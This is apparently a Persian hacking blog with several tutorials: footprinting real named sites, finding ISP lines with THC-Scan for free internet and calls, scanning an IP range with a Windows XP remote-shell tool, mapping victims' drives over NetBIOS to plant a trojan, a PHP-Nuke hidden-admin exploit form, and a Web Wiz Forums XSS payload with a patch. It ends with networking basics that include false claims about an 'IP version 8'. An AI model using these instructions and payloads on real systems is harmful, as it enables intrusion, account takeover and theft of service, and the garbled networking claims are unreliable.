مثلا ping sazin.com را در command prompt تايپ کردم و به نتايج زير رسيدم :
Pinging sazin.com [63.148.227.65] with 32 bytes of data:
Reply from 63.148.227.65: bytes=32 time=1402ms TTL=105
Reply from 63.148.227.65: bytes=32 time=941ms TTL=105
Reply from 63.148.227.65: bytes=32 time=981ms TTL=105
Reply from 63.148.227.65: bytes=32 time=851ms TTL=105
Ping statistics for 63.148.227.65:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 851ms, Maximum = 1402ms, Average = 1043ms
اين نتايج نشان میدهد که sazin.com فعال است.
حالا به کامپيوتری با ip شماره 63.148.227.65 (که همان sazin.com است)، ping میکنم. نتايج همان است فقط با تغييراتی در سطر اول. (البته time که معنای مدت زمان رسيدن پکت را میدهد، با توجه به ترافيک شبکه، کم و زياد خواهد شد). برای ping کردن به اين ip ، دستور 63.148.227.65 ping را صادر میکنم :
Pinging 63.148.227.65 with 32 bytes of data:
Reply from 63.148.227.65: bytes=32 time=861ms TTL=105
Reply from 63.148.227.65: bytes=32 time=852ms TTL=105
Reply from 63.148.227.65: bytes=32 time=851ms TTL=105
Reply from 63.148.227.65: bytes=32 time=881ms TTL=105
Ping statistics for 63.148.227.65:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 851ms, Maximum = 881ms, Average = 861ms
فرض کنيد که به يک ip که فعال نيست، ping کنيم:
Pinging 217.66.196.1 with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Ping statistics for 217.66.196.1:
Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
که نشان میدهد که آن ip در آن لحظه فعال نيست.
البته تمام مطالبی که در بالا ذکر شد، در حالتی است که مستقيما به اينترنت وصل شدهايد و يا اگر از طريق شبکه محلی به اينترنت وصل هستيد، شبکه شما به درستی پيکربندی شده باشد. اصولا ping يکی از بهترين دستورات برای پيدا کردن ايراد در شبکه است.
- tracert چيست ؟
tracert ( در يونيکس میشود traceroute ) ابزاری است که نشان میدهد که يک packet اطلاعاتی از کامپيوتر شما چه مسيری را طی میکند و از چه کامپيوترهايی میگذرد تا به يک مقصد خاص برسد. مقصد را ما مشخص میکنيم و معمولا همان کامپيوتری است که داريم footprinting میکنيم.
کاربرد اين دستور به صورت زير است:
tracert ip-or-domain
مثلا میخواهم ببينم که از چه کامپيوترهايی بايد رد شويم تا به sazin.com برسيم. برای اينکار میتوان از يکی از دستورهای زير استفاده کرد:
tracert sazin.com
tracert 63.148.227.65
به نتيجه زير رسيدم:
Tracing route to sazin.com [63.148.227.65]
over a maximum of 30 hops:
1 160 ms 160 ms 160 ms 217.218.84.3
2 381 ms 691 ms 1772 ms 217.218.84.5
3 * * 2324 ms 217.218.77.1
4 201 ms 1101 ms 180 ms 217.218.0.252
5 341 ms 220 ms 180 ms 217.218.0.2
6 1993 ms 180 ms 181 ms 217.218.158.41
7 180 ms 160 ms 160 ms 195.146.63.101
8 2824 ms * * 195.146.32.134
9 1472 ms 1463 ms 871 ms 195.146.33.73
10 791 ms 841 ms 811 ms if-1....eglobe.net [207.45.218.161]
11 1692 ms * 2654 ms if-4-....eglobe.net [207.45.222.77]
12 1282 ms 891 ms 1052 ms if-1-....globe.net [207.45.220.245]
13 902 ms 931 ms 881 ms if-15.....globe.net [66.110.8.134]
14 931 ms 861 ms 871 ms if-8-....leglobe.net [64.86.83.174]
15 901 ms 841 ms 852 ms if-5-.....globe.net [207.45.223.62]
16 841 ms 862 ms 851 ms pos6-.....vel3.net [209.0.227.33]
17 841 ms 842 ms 941 ms so-4-1.....vel3.net [209.247.10.205]
18 882 ms 931 ms 851 ms so-0-1....vel3.net [209.247.11.197]
19 871 ms 891 ms 951 ms gige9....vel3.net [209.247.11.210]
20 1011 ms 851 ms 902 ms unknown.Level3.net [63.208.0.94]
21 852 ms * 882 ms 64.156.25.74
22 961 ms 942 ms 841 ms 63.148.227.65
Trace complete.
اين نتايج نشان میدهد که بايد از ۲۲ کامپيوتر بگذرم تا به sazin.com برسم. اين اطلاعات همانطور که بعدا خواهيد ديد، حاوی اطلاعات زيادی برای پيدا کردن فايروالها و ... است. (بعضی سطرها رو کوتاه کردم و بهجاش .... گذاشتم)
tracert دارای تعدادی switch است که دوتاش رو توضيح میدم:
d- ==>
با استفاده از اين سويچ در نتايج حاصله فقط ip ها نمايش داده میشود.
مثلا مینويسيم: tracert sazin.com -d
h max-hops- ==>
حداکثر تعداد گامها را تعيين میکند. حالت پيشفرض ۳۰ است.
مثلا مینويسيم: tracert sazin.com -h 50
از اين دستور بعدا بسيار استفاده خواهيم کرد.
- ادامه بحث telnet
telnet هم جزو مواردی است که در footprinting مورد استفاده قرار میگيرد. کاربرد آن در حالتيست که بخواهيم بدانيم که روی فلان پورت چه برنامهای فالگوشه و version آن چنده. به اين صورت که به يک پورت خاص (که ميدانيم روی آن سرور باز است) تلنت میکنيم و بعد میبينيم که نتايجی ظاهر میشود که نشاندهنده اطلاعاتی است که بهکار میرود. گاهی با مکثی طولانی مواجه میشويم و هيچ چيزی نمايش داده نمیشود، در اين حالت يکی دوبار , Ctrl+Z , Ctrl+D , Ctrl+C , Ctrl+break را میزنيم و خارج میشويم. در مثال پايين جمعبندی مواردی که تا حالا از footprinting گفتهام را میآورم.
- جمعبندی مطالب گفته شده و بررسی يک سايت
فرض کنيد میخواهيم در مورد www.iums.ac.ir اطلاعاتی کسب کنيم :
◊ اول به سايت پينگ میکنم و ip آن را بهدست میآورم: 194.225.184.15
◊ به کمک ip که بهدست آورديم، به کمک يک پورت اسکنر پورتها را بررسی میکنيم و میبينيم که پورتهايی مثل ۲۱، ۲۵، ۴۲، ۵۳، ۸۰، ۱۱۰، ۱۱۹، ۱۳۹، ۱۴۳ و ... باز است.
◊ چون domain به ir ختم میشود، برای whois کردن از whois.nic.ir استفاده میکنم و Name Server آن را به دست میآورم که 194.225.184.20 است.
◊ به کمک اين Name Server ، يک nslookup میکنم و به نتايج زير میرسم:
iums.ac.ir. SOA sina.i........0 345600)
iums.ac.ir. NS sina.iums.ac.ir
iums.ac.ir. NS ns1.nic.ir
iums.ac.ir. MX 10 sina.iums.ac.ir
smtp.iums.ac.ir. A 195.146.34.181
sina.iums.ac.ir. HINFO Sun-SuperSPARC5/75 UNIX-Solaris-2.6
sina.iums.ac.ir. MX 10 sina.iums.ac.ir
sina.iums.ac.ir. A 194.225.184.20
sina.iums.ac.ir. A 195.146.34.181
sun.iums.ac.ir. CNAME sina.iums.ac.ir
cisco.iums.ac.ir. CNAME router.iums.ac.ir
webmail.iums.ac.ir. A 195.146.34.181
linux.iums.ac.ir. A 194.225.184.19
linux.iums.ac.ir. HINFO Intel-Xeon/800 RedHat-Linux-7.2
mta.iums.ac.ir. A 195.146.34.181
pop3.iums.ac.ir. CNAME sina.iums.ac.ir
localhost.iums.ac.ir. A 127.0.0.1
proxy.iums.ac.ir. CNAME arvand.iums.ac.ir
www.iums.ac.ir. A 195.146.34.180
atrak.iums.ac.ir. A 194.225.184.14
ns1.iums.ac.ir. CNAME sina.iums.ac.ir
arvand.iums.ac.ir. A 194.225.184.13
router.iums.ac.ir. A 194.225.184.1
router.iums.ac.ir. HINFO Cisco3640/Access-Server IOS-IP-12.0
iums.ac.ir. SOA sina.iu.......3456000 345600)
تک تک سطرهای اين نتايج کاربرد دارد که خواهيم رسيد. الان فقط در مورد HIFNO صحبت میکنم که برای مشخص تر بودن در بالا به صورت کمی فرورفتهتر نوشتم. مثلا:
sina.iums.ac.ir. HINFO Sun-SuperSPARC5/75 UNIX-Solaris-2.6
HIFNO برای تعيين نوع کامپيوتر و سيستمعامل سرور اهميت دارد. در اين سطر مشخص است که sina.iums.ac.ir از Sun-SuperSPARC5/75 UNIX-Solaris-2.6 استفاده میکند.
◊ چون پورتهای باز را هم توسط پورت اسکنر به دست آوردهام به آنها تلنت میکنم با دستور:
telnet www.iums.ac.ir portnum
نتايج حاصل از بعضی را میبينيد:
25 :
... master.iums.ac.ir Microsoft ESMTP MAIL Service, Version: 5.0.2195.4905 ready at 220
پس پورت ۲۵ (smtp) در آن کامپيوتر از Microsoft ESMTP MAIL Service, Version: 5.0.2195.4905 استفاده میکند.
110 :
.OK Microsoft Exchange 2000 POP3 server version 6.0.5762.3 (master.iums.ac.ir) ready+
پس پورت ۱۱۰ (pop3) در آن کامپيوتر از Microsoft Exchange 2000 POP3 server version 6.0.5762.3 استفاده میکند.
119 :
NNTP Service 5.00.0984 Version: 5.0.2195.2966 Posting Allowed
و …
| +| نوشته شده توسط
امین استادابراهیم در هفتم آبان 1385
| |
| | | |
|
|
|
|
این بحث در مقوله ی هک کردن ای اس پی گنجانده می شود که ما برای این کار به یک برنامه به نام THC-Scan 2.0 احتیاج داریم که می توانید آن را از:
www.thc.infreno.tusculum.edu
دریافت کنید همچنین باید به سایت Network Solution رفته و در بالای صفحه به دنبال گزینه ی Who is بگردید و بعد از پیدا کردن آن بر روی لینک آن کلیک کنید و در بخش Domain یا در قسمت Site Name اسم سایت مورد نظر را خود را که همان سایت ای اس پی مورد نظر خود است را بنویسید و سپس Search کرده و در صفحه ی باز شده شماره تلفن هایی را که نمایش داده است را یادداشت کرده و به کمک نرم افزار THC-Scan 2.0 ای اس پی خود را مورد پویش قرار دهید
اگر به این شکل نتوانستید شماره تلفنی پیدا کنید می توانید به 118 تلفن کرده و از آن شماره های اداری ای اس پی خود را بگیرید و یادتان باشد که این شماره با شمار های اتصال به شبکه فرق می کند
حالا می چگونه می توانیم با نرم افزار فوق این کار را کنیم؟
بعد از اجرا کردن برنامه شماره تلفن را به آن داده و آن شروع به سرچ می کند و پس از اتمام سرچ دوباره شماره تلفن هایی را به شما می دهد که این شماره ها همان شماره هایی هستند که می توانید با زنگ زدن به آن ها((که آموزشش را الان می دهم))به صورت رایگان به اینترنت وصل شده و یا رایگان به جایی زنگ بزنید
1.برای تلفن به خارج یا تلفن زدن رایگان به وسیله ی آن شماره تلفن ها این کارها را انجام دهید:
با تلفن معمولی یا به وسیله ی Hyper Terminal در قسمت Start-->All Programs-->Accessories-->Communication-->Hyper Terminal به آن شماره ها زنگ زده و به صورت رایگان به هر جایی تلفن بزنید
2.برای وصل شدن به اینترنت به صورت رایگان این کارها را انجام دهید:
در بخش Connection و یا همان صفحه ای که به روش Dial-up به اینترنت وصل می شوید دو قسمت Username و password را خالی گذاشته و شماره ی پیدا شده را در قسمت Dial بنویسید و بعد به صورت رایگان به اینترنت وصل شوید
دوستان عزیز یادتان باشد حتما قبل از شروع این کار اطلاعات کاملی در مورد نحوه ی حفاطت ئ امنیت ؟آی اس پی مورد نظر خود پیدا کنید چون اگر محافظت از ای اس پی بالا باشد و شما هم مثلا به طور شانسی توانستید این کار را بکنید هنگامی که شما به آن شماره ها زنگ می زنید شماره ی شم در حافظه ی آن ای اس پی ثبت می شود و اگر آن ها شماره ی شما را پیدا کنند به راحتی می توانند علیه شما شکایت کنند البته گفتم اگر حفاظت از آن ای اس پی پایین بود می توانید یک دور کامل به ای اس پی نفوذ کرده و شماره ی خود را از حافظه ی آن پاک کنید و اگر حرفه ای هستید این کار را بکنبد و گرنه هر مشکلی که برایتان پیش آمد من هیچ مسولیتی ندارم
| +| نوشته شده توسط
امین استادابراهیم در هفتم آبان 1385
| |
| | | |
|
|
|
|
با سلام خدمت دوستان عزيز
بعد از چند وقت که منتظر بوديد امروز می خواهم روش عملی هک کردم به وسيله ی يکی از باگ هايی که در ويندوز های ايکس پی است و به وسيله ی آن می توانيد به کامپيوتر های ديگران شل گرفته و وارد آن شويد و هر کاری را بتوانيد بکنيد(بدون فرستادن فايل)
شما نيازمند برنامه ی Kath2هستيد که شما می توانيد آن را از اینجادانلود دکنيد
برنامه را در درايو c خود کپی کنيد حال به داس رفته و تمامی کارها ی من را تکرار کرده تا به کامپيوتر های ديگران نفوذ کنيد و فرمول های زير را تک به تک بنويسيد شما بايد قبل از اينکه اين برنامه را اجرا کنيد بايد رنج آ ی پی خود را به دست آوريد بدين منظور روی ۲ کامپيوتر پايين صفحه که نمايانگر اتصال شما به اينترنت است کليک کرده و در تب دوم آن در جلوی جمله ی Client ip address: آدرس آی پی خود را به دست بياوريد حال اگر آی پی شما ۱۲۷.۰.۰.۱ بود رنج آی پی شما می شود ۱۲۷.۰.۰.۰ تا ۱۲۷.۰.۰.۲۵۵
حال مثلا آی پی من ۲۲۵.۳۵.۴۵.۱۲ است پس رنج آی پی من می شود
۲۲۵.۳۵.۴۵.۰ تا ۲۲۵.۳۵.۴۵.۲۵۵
حال مراحل زير را برويد تا به کامپيوتر مورد نظر متصل شويد
ابتدا محلی که برنامه است رفته (چون اين برنامه در درايو c است ما به درايو c می رويم )با نوشتن فرمول زير
:c
حال بايد برنامه را اجرا کنيم با استفاده از فرمول زير
k.exe
يا
s
حال بايد رنج آی پی خود را به برنامه بديهم تا چک کند چه کامپيوتر هايی در محدوده ی آی اس پی ما آنلاين هستند و آيا اين نوع باگ بر روی آنها باز است يا بسته؟
k 225.35.45.0 225.35.45.255
باز ياد آورم شوم شما بايد در فرمول بالا بايد به جای اعداد ۲۲۵.۳۵.۴۵.۰ و ۲۲۵.۳۵.۴۵.۲۵۵ رنج آی پی خود را قرار دهيد
سپس برنامه تک به تک آی پی ها را چک می کند و در صورت آنلاين بود کامپيوتر ها و باز بودن آن باگ شما به آن کامپيوتر متصل شده و به پوشه ی سيستم ۳۲ آن رفته و می توانيد کارهای شيطانی خود را انجام دهيد.
حال اگر شما بخواهيد به درايو جاری برويد از فرمول زير استفاده کنيد
/cd
بعد ديگه خدا می داند که چه بلاهايی سرشون می ياريد فايل پاک می کنيد برنامه می گيريد يا می فرسيد.
نظر یادتون نره
| +| نوشته شده توسط
امین استادابراهیم در هفتم آبان 1385
| |
| | | |
|
|
|
|
بعد از نوشتن اسم سایت پسوند زیر را در انتهای آن قرار دهید
.nyud.net:8080
مثل
www.bia2.com.nyud.net:8080
برید حالشو ببرید
| +| نوشته شده توسط
امین استادابراهیم در هفتم آبان 1385
| |
| | | |
|
|
|
|
سلام دوستان
خیلی ها دوست دارن سایت هک کنن ولی به علتهای مختلف یا نمیتونن وقت بزارن روش یا سایت امنیتش بالاست یا فرد دانش هک کردن رو نداره و... حالا در این درس به آموزش چندین روش برای آموزش هک متداول ترین فروم که PHP-Nuke است بپردازیم.
اول باید خصوصیات سایت را بررسی کنید و اولین خوصوصیات ضروری پی اچ پی نوک بودن آن هست! به روش های مختلف هک کردنه یوزر ادمین یا ساختن ادمین مخفی را یاد بگیرید.
در هر سایت نوک یک فروم قرار دارد و همینوطور که میدانید در فروم یک یا چند نفر به cp (مخفف کنترل پانل) دسترسی دارند. شاید از همین فکر چیزی فهمیده باشید. پس در هر تالار چندین کاربر (user) وجود دارد (بستگی به کیفیت تالار دارد) و مدیر هم در بین این کاربران هست و نا کاربری او فاحش هست و می توانید آن را به راحتی ببینید.با این توضیح شما دو روش را برای هم حدس زدید. درسته ! می گن هک سایت سخته ولی اونقدرا هم سخت نیست حتی با ماجیک هم میشه سایت هک کرد! پس فعلا با ماجیک هک می کنیم تا برسیم به جاهای پیشرفته!
..آموزش عزراییل جون رو بخونید در مورد نفوذ به سیستم از طریق نت بایوس (در انجمن هک و امنیت) و بعد ادامه ی این درس را بخونید.
حالا که یک تروجان در ستارت آپ طرف کپی شد و پسورد او را دریافت کردید.....
هر کاربر در هنگام ثبت نام در هر تالاری در سایت های نوک باید به اجبار ایمیلی برای خود انتخاب کند که پسورد انتخاب شده به آن ایمیل ارسال شود. ایم خودش یک باگ امنیتی هست و لازم نیست که حتما اکسپلویتی جولوی شما باشد! (ولی بعد از این روش با اکسپلویتی برای هک نوک هک آشنا می شوید)خوب به قسمت (رمزعبور را فراموش کردم) یا ( Forget PassWord ) بروید و ایمیل طرف را وارد تا پسورد فرستاده شود. (این عمل در صورتی اتفاق می شود که نام کاربری بوسیله ی یک ایمیل پشتیبانی شود که در اغلب فروم ها اینجوری هست) حالا که پسورد کاربر مدیر و یا همان شناسه مدیر را گرفتید به منطقه ی کنترل (کنترل پانل) نفوذ کنید و شناسه ی حای را پاک کرده و شناسه ای بسازید و index را عوض کنید.
خیلی ها دوست دارن سایت هک کنن ولی به علتهای مختلف یا نمیتونن وقت بزارن روش یا سایت امنیتش بالاست یا فرد دانش هک کردن رو نداره و... حالا در این درس به آموزش چندین روش برای آموزش هک متداول ترین فروم که PHP-Nuke است بپردازیم.
اول باید خصوصیات سایت را بررسی کنید و اولین خوصوصیات ضروری پی اچ پی نوک بودن آن هست! به روش های مختلف هک کردنه یوزر ادمین یا ساختن ادمین مخفی را یاد بگیرید.
در هر سایت نوک یک فروم قرار دارد و همینوطور که میدانید در فروم یک یا چند نفر به cp (مخفف کنترل پانل) دسترسی دارند. شاید از همین فکر چیزی فهمیده باشید. پس در هر تالار چندین کاربر (user) وجود دارد (بستگی به کیفیت تالار دارد) و مدیر هم در بین این کاربران هست و نا کاربری او فاحش هست و می توانید آن را به راحتی ببینید.با این توضیح شما دو روش را برای هم حدس زدید. درسته ! می گن هک سایت سخته ولی اونقدرا هم سخت نیست حتی با ماجیک هم میشه سایت هک کرد! پس فعلا با ماجیک هک می کنیم تا برسیم به جاهای پیشرفته! حالا بايد به سيستم طرف براي نصب تروجان نفوذ كنيد و نت بايوس بهترين راه هست!
نفوذ به سيستم از طريق NetBios
-------------------------------------------
با یاد گیری این مقاله شما میتونید یک درایو از سیستم قربانی رو به وسیله نت بایوس Share کنید و هر کاری که خواستید توی اون درایو انجام بدید ( فایل بذارید ، بردارید ، پاک کنید و ... ) البته من این مقاله رو به صورت تصویری هم تو سایت گذاشتم ، می تونید دانلود کنید.
خب بریم سره موضوع اصلی:
اول باید IP سیستم مورد نظر رو پیدا کنید ( تو سایت قبلا اموزش دادم ) ، بعد از منوی Start قسمت Run برید و تایپ کنید CMD. بعد از اینکه وارد CMD شدید این دستور رو بنویسید:
Net use x: \\IP\DriveName$
به جای X میتونید هر حرفی رو بنویسید به غیر از حروفی که اسم درایو های خودتون هست.مثلا اگه درایو G داشته باشید ، از حرف G نمیتونید استفاده کنید. به جای IP هم ای پی مورد نظر رو که می خواهید بهش نفوذ کنید رو بنویسید. به جای DriveName هم اسم درایو رو بنویسید. اگه مثلا میخواهید درایو C رو Share کنید ، حرف c رو بنویسید.یک نمونه از دستور رو ببینید:
Net use x: \\80.191.191.39\c$
اگه کمی شانس داشته باشید بدون در خواست User Name و Password درایو Share میشه و این پیغام رو مینویسه: The command completed successfully اما اگه از شما در خواست یوزر نیم و پسورد کرد به جای یوزر نیم کلمه Administrator رو وارد کنید که برای ویندوز XP و 2000 تعریف شده است ( البته معمولا تو یه خط یوزر نیم رو میده ).پسورد هم میتونید با یه برنامه مثل بروتوس( Brutus ) پیدا کنید.
اگه شما درایوی رو Share کرده باشید که ویندوز قربانی هم تو همون درایو نصب شده باشه ، می تونید سرور یک تروجان رو تو پوشه Startup تو قسمت Start Menu کپی کنید و منتظر باشد قربانی ریستارت کنه تا فایل سرور اجرا شه و شما به راحتی با تروجان به سیستم وارد بشید. ( یادتون باشه که سرور رو فقط کپی کنید چون اگه اجرا کنید در واقع تو سیستم خودتون اجرا کردید ) (نويسنده : فرشاد عزيز)
حالا که یک تروجان در ستارت آپ طرف کپی شد و پسورد او را دریافت کردید.....
هر کاربر در هنگام ثبت نام در هر تالاری در سایت های نوک باید به اجبار ایمیلی برای خود انتخاب کند که پسورد انتخاب شده به آن ایمیل ارسال شود. ایم خودش یک باگ امنیتی هست و لازم نیست که حتما اکسپلویتی جولوی شما باشد! (ولی بعد از این روش با اکسپلویتی برای هک نوک هک آشنا می شوید)خوب به قسمت (رمزعبور را فراموش کردم) یا ( Forget PassWord ) بروید و ایمیل طرف را وارد تا پسورد فرستاده شود. (این عمل در صورتی اتفاق می شود که نام کاربری بوسیله ی یک ایمیل پشتیبانی شود که در اغلب فروم ها اینجوری هست) حالا که پسورد کاربر مدیر و یا همان شناسه مدیر را گرفتید به منطقه ی کنترل (کنترل پانل) نفوذ کنید و شناسه ی حای را پاک کرده و شناسه ای بسازید و index را عوض کنید. قبل از اینکه ورود به کنترل پانل را به شما یاد دهیم بهتر استروش دیگری برای ساخت ادمین مخفی ( hide admin ) یاد بگیریم! اول باید بفهمیم که نوک چیست؟
پی اچ پی نوک انواع مختلفی دارد که از سال ۲۰۰۱ به ورژن های مجانی تبدیل شد و برای همین شهرت زیادی پیدا کرد در ابتدا تیم های آمریکایی و پاکستانی ورزن های ۶.۸ . ۶.۹ را مجانی کردند و ایرانی های عزیز نیز برای هموطننانشان از ورژن ۷.۳ تا ۷.۸ (آخرین نسخه) را ترجمه کردند و نوک های فراسی را بوجود آوردند. مثل گروه معروف IranNuke
این اکسپلویت هم به شما کمک می کند که در کنترل پانل سایت نوک وارد شوید و شناسه ی مدیرتی برای خود بسازید. این اکسپولیت برای نوک ۷.۳ تا ۷.۷ هست و نوک ۷.۸ را فقط اگر روی لکال هاست باشد هک می کند.
<form name="mantra" method="POST" action="http://www.sitename.com/admin.php"> USERNAME: <input type="text" name="add_aid"><br> NOME: <input type="text" name="add_name"><br> PASSWORD: <input type="text" name="add_pwd"><br> E-MAIL: <input type="text" name="add_email"><br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"><br> <input type="hidden" name="add_radminsuper" value="1"><br> <input type="hidden" name="op" value="AddAuthor"></p> <input type="submit" name="Submit" value="Create Admin"><br> </form>
خوب در قسمتی از کد نوشته شده: http://www.sitename.com/admin.php
به جای sitename نام سایت را بنویسید و آن را با پسوند html ذخیره سازید.
به این صورت : exploit.html
حالا روی آن کلیک کنید و صفحه ای همانند صفحه ی عضویت در آن تالار باز می شود! (حالا بستگی دارد که چه چیز هایی از شما درخواست کند) حالا آن را که پر کردید در زیر آن Create Admin را کلیک کنید و مستقیما به http://www.sitename.com/admin.php میرید و اونجا با یوزری (شناسه ایی) که ساختید وارد شوید! حالا شما هم سایت پی اچ پی نوک هک کردید!
موفق باشید
| +| نوشته شده توسط
امین استادابراهیم در هفتم آبان 1385
| |
| | | |
|
|
|
|
اين پرتال پر استفاده ترين پرتال asp در ايرانه که با نامهاي مختلف (بدون لايسنس) استفاده ميشه
اينم ايز چند تا باگ درست و را دست براي آخرين ورپن ها ي
Web Wiz Forums Web Wiz Forums 7.5
Web Wiz Forums Web Wiz Forums 7.7 b
Web Wiz Forums Web Wiz Forums 7.7 a
Web Wiz Forums Web Wiz Forums 7.8
Web Wiz Forums Web Wiz Forums 7.51
اما در اين ورپن کار نميکنه :
not vulnerable Web Wiz Forums Web Wiz Forums 7.9
اون :
كد:
registration_rules.asp?FID=%22%3E%3Cscript%3Ealert%28%27Vulnerable%2520%21%2
7%29%3C%2Fscript%3E
طريقه پچ كردن حرفه اي اون :
راه دستي :
ميگرديد و فايل registration_rules.asp را از شاخه اي كه فروم web wiz قرار دارد پيدا ميكنيد .
بعد به دنبال خط زير ميگرديد :
كد:
intForumID = Request.QueryString("FID")
و به اين خط تغييرش ميدهيد :
كد:
If isNumeric(Request.QueryString("FID")) Then
intForumID = CInt(Request.QueryString("FID"))
Else
intForumID = 0
End If [/code]
| +| نوشته شده توسط
امین استادابراهیم در هفتم آبان 1385
| |
| | | |
|
|
|
|
ما درباره ی ویندوز و دستورات آن در ۲۰۰۰ و مقداری هم tcp/ip یا همون transmission controll protocol /internet protocol حرف زدیم جالب است بدانید که هر چه آدرس آی پی طولانی تر یعنی xxx.yyy.zzz,......بیشتر باشد سرعت انتقال داده ها هم بیشتر است به طوری که آی پی ورژن ۸ به بعد سرعتی حدود ۴۰giga bit دارند یعنی عرض چند ثانیه میتونید هاردتون را به اون ور دنیا بفرستید این نوع ورژن از آی پی رو نمیدونم چطوری کار می کنن حتی میتونم بگم که دکترای کامپیوتر شریف هم اینو نخوندن خلاصه این آدرس آی پی یه چیز عظیم هست که هر کی توپ بلد باشه یه هکر حرفه ای هست و میتونه راحت حتی سرور سیا آمریکا که می گن قوی ترین و نا نفوذ ترین سرور دنیا است رو هک کنه شاید ما این کا ر و کردیم ( عمرا ) لازم به ذکر است که آدرس این نوع ورژن به صورت aaa.bbb.ccc.ddd.eee.fff.ggg.hhh است که هر حرف مقدار عددی توان دو است و به hub کامپیوتر های قوی و ابر کامپیوتر ها وصل می شن . ما فعلا کارمون رو با آی پی ورژن ۴ شروع می کنیم (یعنی همون dial up modem ) چون هم امکاناتش نیست هم خیلی خیلی پیشرفته است . ادرس این نوع آی پی به صورت aaa.bbb.ccc.ddd هست که هر کدوم شامل اعدادی است که ما برای شما خواهیم گفت . حالا درس امروز :
قسمت اول
همانگونه كه انسانها براي ارتباط با يكديگربه زباني (جدا از زبان مادري ) مشترك نياز دارند , كامپيوتر ها نيز به قواعدي ( مستقل از نوع سيستم عامل ) احتياج دارند كه طبق آن قواعد بتوانند با همديگر ارتباط برقرار كنند . در ابتدا مدل OSI مورد قبول سازمان استاندارد جهاني قرار گرفت . در اين مدل وظايف و خدمات شبكه در 7 لايه تعريف شده بود :
7- لايه كاربرد (Application Layer )
6- لايه نمايش ( Presentation Layer )
5- لايه جلسه ( Session Layer)
4- لايه انتقال ( Transport Layer )
3- لايه شبكه ( Network Layer )
2- لايه پيوند داده ها ( Data Link Layer )
1- لايه فيزيكي ( Physical Layer)
در ابتدا گمان ميشد اين مدل بصورت استاندارد فراگير در تمام شبكه ها بكار گرفته شود اما به دلايلي ( از جمله انتشار رايگان برنامه هاي TCP/IP توسط دانشگاه بركلي ) اين مدل پايدار نماند و مدل TCP/IP مورد استفاده قرار گرفت و بصورت استانداردي فراگير براي ارتباط بين كامپيوترها در اينترنت انتخاب شد .
TCP/IP براي ايجاد ارتباط بين كامپيوترها ابتدا اطلاعات ارسالي از سيستم عامل مبدا را طبق استانداردهاي خودش به بسته هايي تبديل كرده و سپس در مقصد اطلاعات دريافتي را مجددا ترجمه كرده به سيستم عامل مقصد تحويل ميدهد . براي اينكار TCP/IP كه مبناي اينترنت است را به 4 لايه تقسيم كرده اند :
4- لايه كاربرد ( Application Layer )
3- لايه لايه انتقال (Transport Layer )
2- لايه شبكه ( Network Layer )
1- لايه واسط شبكه (Network Interface Layer )
لايه اول : واسط شبكه Network interface
در اين لايه استانداردهاي سخت افزاري, نرم افزارهاي راه انداز و پروتكلهاي شبكه تعريف ميشوند .
لايه دوم : شبكه Network Internet
در اين لايه بسته هاي اطلاعاتي ( كه از اين به بعد به آنها بسته هاي IP ميگوييم ) روي شبكه هدايت ميشوند تا به مقصد برسند . مهمترين پروتكلي كه در اين لايه استفاده ميشود پروتكل IP است كه ديتاگرامها (واحدهاي اطلاعاتي كه بايد تحويل مقصد شوند ) را به بسته هاي كوچكتري تبديل ميكند و پس از اضافه كردن اطلاعات لازم براي بازسازي آنها را روي شبكه ارسال ميكند .
لايه سوم : انتقال Transport
اين لايه بر اساس سرويسي كه لايه دوم ارائه ميدهد يك ارتباط مطمئن بين ميزبانها برقرار ميكند . دريافت يا عدم دريافت بسته هاي ارسالي در اين لايه مشخص ميشود. مهمترين پروتكل استفاده شده در اين لايه پروتكل TCP است .
لايه چهارم : كاربرد Application
اين لايه بر اساس خدمات لايه هاي زيرين , سرويس سطح بالايي براي خلق برنامه هاي كاربردي ارائه ميدهد .
لايه اينترنت ( IP ) :
لايه IP يك ديتاگرام را از لايه بالاتر تحويل ميگيرد , اگر طول ديتاگرام بزرگ باشد آنرا به واحدهاي كوچكتر تبديل ميكند و با اضافه كردن اطلاعات لازم آنرا در شبكه به جريان مي اندازد .پروتكل IP مجبور است قبل از ارسال بسته يك شماره شناسايي براي كل بسته و يك شماره ترتيبي براي هر قطعه در نظر بگيرد تا ديتاگرام بتواند در مقصد بازسازي شود .
در كنار پروتكل IP چند پروتكل ديگر مانند ICMP,ARP,RARP,RIP و ... وجود دارند كه در مسيريابي صحيح, مديريت خطاها و به مقصد رسيدن بسته ها به پروتكل IP كمك ميكنند .
بسته هاي IPشامل دو قسمت سرايند و ديتا ميباشند . اطلاعات موجود در سرايند مورد پردازش مسيريابها قرار ميگيرند . اين اطلاعات شامل فيلدهاي زير است :
1- فيلد Version :
4 بيتي است و نسخه IP را مشخص ميكند . اين فيلد شامل عدد 4 يا عدد 6 براي برخي مسيريابهاست.
2- فيلد IHL :
4 بيتي است و طول كل هدر را براساس كلمات 32 بيتي مشخص ميكند .
3- فيلد Type of Service :
8 بيتي است و شامل تقاضاي سرويس ويژه اي براي ارسال ديتا گرام دارد .
4- فيلد Total Length :
16 بيتي است و طول كل بسته شامل هدر و ديتا را مشخص ميكند .
5- فيلد Identification :
16 بيتي است و براي مشخص كردن شماره يك ديتاگرام بكار ميرود.
6- فيلد Fragment Offset :
15 بيتي و شامل دو قسمت است :
Flag :
شامل 2 بيت است يكي براي مشخص كردن قطعه نهايي ديتاگرام(MF) . 1 بودن اين پرچم به اين معناست كه قطعات ديگري نيز براي كامل كردن اين ديتاگرام لازم است و صفر بودن ان به اين معناست كه اين اخرين قطعه ديتاگرام است . بيت ديگر براي مشخص كردن اين نكته است كه ديتاگرام نبايد قطعه قطعه شود (DF) .
Fragment offset :
13 بيتي است و شماره ترتيب قطعه را براي بازسازي ديتاگرام در بر دارد . نكته مهم در اينجا اينست كه اندازه هر قطعه به استثناي قطعه پاياني بايد ضريبي از 8 باشد .
7- فيلد Time To Live :
8 بيتي است و براي مشخص نمودن طول عمر بسته استفاده ميشود . اين فيلد حداكثر ميتواند شامل 255 باشد كه به اين معني است كه 255 مسيرياب را ميتواند طي كند .
8- فيلد Protocol :
